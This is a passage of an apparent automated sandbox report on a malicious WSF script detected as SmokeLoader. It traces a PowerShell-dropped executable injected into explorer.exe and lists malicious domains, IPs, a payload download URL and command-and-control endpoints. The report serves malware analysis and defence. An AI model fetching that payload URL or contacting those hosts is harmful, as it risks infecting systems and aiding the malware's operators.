      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00418A70 InterlockedCompareExchange,GetFocus,ReadConsoleA,FindAtomA,SearchPathA,SetConsoleMode,SearchPathW,GetDefaultCommConfigA,CopyFileExW,CreatePipe,GetEnvironmentStringsW,WriteConsoleOutputA,GetModuleFileNameA,GetSystemTimeAdjustment,ObjectPrivilegeAuditAlarmW,WaitForSingleObject,SetCommState,GetConsoleAliasesLengthW,GetComputerNameA,CopyFileW,GetFileAttributesA,GetConsoleAliasExesLengthW,GetBinaryType,FormatMessageA,GetLongPathNameA,PurgeComm,LoadLibraryA,MoveFileW,InterlockedCompareExchange,12_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 14_2_0AC43520 GetUserNameW,14_2_0AC43520
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information22
      Scripting
      Valid Accounts1
      Native API
      22
      Scripting
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      OS Credential Dumping11
      System Time Discovery
      Remote Services1
      Archive Collected Data
      13
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Exploitation for Client Execution
      1
      DLL Side-Loading
      312
      Process Injection
      3
      Obfuscated Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop ProtocolData from Removable Media1
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Command and Scripting Interpreter
      Logon Script (Windows)Logon Script (Windows)12
      Software Packing
      Security Account Manager1
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts6
      PowerShell
      Login HookLogin Hook1
      DLL Side-Loading
      NTDS214
      System Information Discovery
      Distributed Component Object ModelInput Capture124
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Masquerading
      LSA Secrets611
      Security Software Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts231
      Virtualization/Sandbox Evasion
      Cached Domain Credentials231
      Virtualization/Sandbox Evasion
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
      Process Injection
      DCSync3
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Hidden Files and Directories
      Proc Filesystem1
      Application Window Discovery
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
      System Owner/User Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525802 Sample: w4DO1Z18yg.wsf Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 37 unicexpertmagazine.pw 2->37 39 ceoconstractionstore.pl 2->39 41 bestmagazineforanimalsunicum.ru 2->41 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 8 other signatures 2->53 10 wscript.exe 1 2->10         started        13 tesubba 2->13         started        signatures3 process4 signatures5 65 VBScript performs obfuscated calls to suspicious functions 10->65 67 Wscript starts Powershell (via cmd or directly) 10->67 69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->69 77 2 other signatures 10->77 15 cmd.exe 1 10->15         started        71 Antivirus detection for dropped file 13->71 73 Multi AV Scanner detection for dropped file 13->73 75 Detected unpacking (changes PE section rights) 13->75 79 8 other signatures 13->79 process6 signatures7 87 Suspicious powershell command line found 15->87 89 Wscript starts Powershell (via cmd or directly) 15->89 91 Encrypted powershell cmdline option found 15->91 93 2 other signatures 15->93 18 powershell.exe 14 17 15->18         started        23 conhost.exe 15->23         started        process8 dnsIp9 43 unicexpertmagazine.pw 193.46.217.78, 49699, 49845, 49974 CUBENODEES Spain 18->43 33 C:\Users\user\AppData\Local\Temp\oBuf.exe, PE32 18->33 dropped 55 Powershell drops PE file 18->55 25 oBuf.exe 18->25         started        file10 signatures11 process12 signatures13 57 Antivirus detection for dropped file 25->57 59 Multi AV Scanner detection for dropped file 25->59 61 Detected unpacking (changes PE section rights) 25->61 63 9 other signatures 25->63 28 explorer.exe 33 2 25->28 injected process14 dnsIp15 45 ceoconstractionstore.pl 188.40.141.211, 49856, 80 HETZNER-ASDE Germany 28->45 35 C:\Users\user\AppData\Roaming\tesubba, PE32 28->35 dropped 81 System process connects to network (likely due to code injection or exploit) 28->81 83 Benign windows process drops PE files 28->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->85 file16 signatures17

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      w4DO1Z18yg.wsf26%ReversingLabsWin32.Trojan.Leonem
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\tesubba100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Local\Temp\oBuf.exe100%AviraHEUR/AGEN.1312567
      C:\Users\user\AppData\Roaming\tesubba100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oBuf.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\oBuf.exe88%ReversingLabsWin32.Trojan.SmokeLoader
      C:\Users\user\AppData\Roaming\tesubba88%ReversingLabsWin32.Trojan.SmokeLoader
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://outlook.com0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      bestmagazineforanimalsunicum.ru
      193.46.217.78
      truetrue
        unknown
        ceoconstractionstore.pl
        188.40.141.211
        truetrue
          unknown
          unicexpertmagazine.pw
          193.46.217.78
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://openclehardware.ru/index.phptrue
              unknown
              http://bestmagazineforanimalsunicum.ru/download/svc.exetrue
                unknown
                http://ceoconstractionstore.pl/index.phptrue
                  unknown
                  http://informcoopirationunicolceo.ru/index.phptrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000E.00000002.2501943788.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271814403.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://www.pollensense.com/explorer.exe, 0000000E.00000002.2499201257.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000E.00000000.1406417153.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2499201257.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.microsoft.copowershell.exe, 00000004.00000002.1314664931.00000194DB975000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://fwtilsrhssulldop.com/explorer.exe, 0000000E.00000003.2271814403.0000000009013000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        unknown
                                        http://ooxywteyveq.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000E.00000003.2271765227.000000000C4F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271584733.000000000C4B5000.00000004.00000001.00020000.00000000.sdmpfalse
                                          unknown
                                          https://excel.office.comexplorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            unknown
                                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://schemas.microexplorer.exe, 0000000E.00000002.2501271006.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1407973981.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1407494868.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://contoso.com/powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1315560529.00000194DF2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194EDA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://rfcqeahtpbrxjuy.net/explorer.exe, 0000000E.00000002.2509240753.000000000C560000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271403404.000000000C55E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271209149.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://ceoconstractionstore.pl/index.phpings6QPexplorer.exe, 0000000E.00000002.2508785780.000000000C40E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271648841.000000000C40D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://wns.windows.com/explorer.exe, 0000000E.00000000.1408331897.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://ooxywteyveq.com/explorer.exe, 0000000E.00000003.2271765227.000000000C4F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271584733.000000000C4B5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1315560529.00000194DD8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1315560529.00000194DF2A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194EDA82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://word.office.comexplorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://go.micropowershell.exe, 00000004.00000002.1315560529.00000194DE4FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.1336938899.00000194ED94C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://powerpoint.office.comexplorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.foreca.comexplorer.exe, 0000000E.00000002.2499201257.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://outlook.comexplorer.exe, 0000000E.00000002.2507163228.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1410779925.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1315560529.00000194DDAFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://bestmagazineforanimalsunicum.rupowershell.exe, 00000004.00000002.1315560529.00000194DEC1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1315560529.00000194DEEEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://android.notify.windows.com/iOSexplorer.exe, 0000000E.00000000.1408331897.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://rfcqeahtpbrxjuy.net/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000E.00000002.2509240753.000000000C560000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271403404.000000000C55E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2271209149.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000E.00000003.2271814403.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2273440659.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1408331897.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2501943788.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://api.msn.com/explorer.exe, 0000000E.00000003.2271814403.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.1315560529.00000194DD8D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 0000000E.00000002.2499201257.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1406417153.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.40.141.211
                                                                                        ceoconstractionstore.plGermany
                                                                                        24940HETZNER-ASDEtrue
                                                                                        193.46.217.78
                                                                                        bestmagazineforanimalsunicum.ruSpain
                                                                                        203178CUBENODEEStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1525802
                                                                                        Start date and time:2024-10-04 16:35:36 +02:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 36s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:19
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:w4DO1Z18yg.wsf
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:5c7d582ba61ac95fb0d330ecc05feeb4853ac1de1f5a6fd12df6491dd0b7ea34.wsf
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.expl.evad.winWSF@9/5@3/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 75%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 70
                                                                                        • Number of non-executed functions: 14
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .wsf
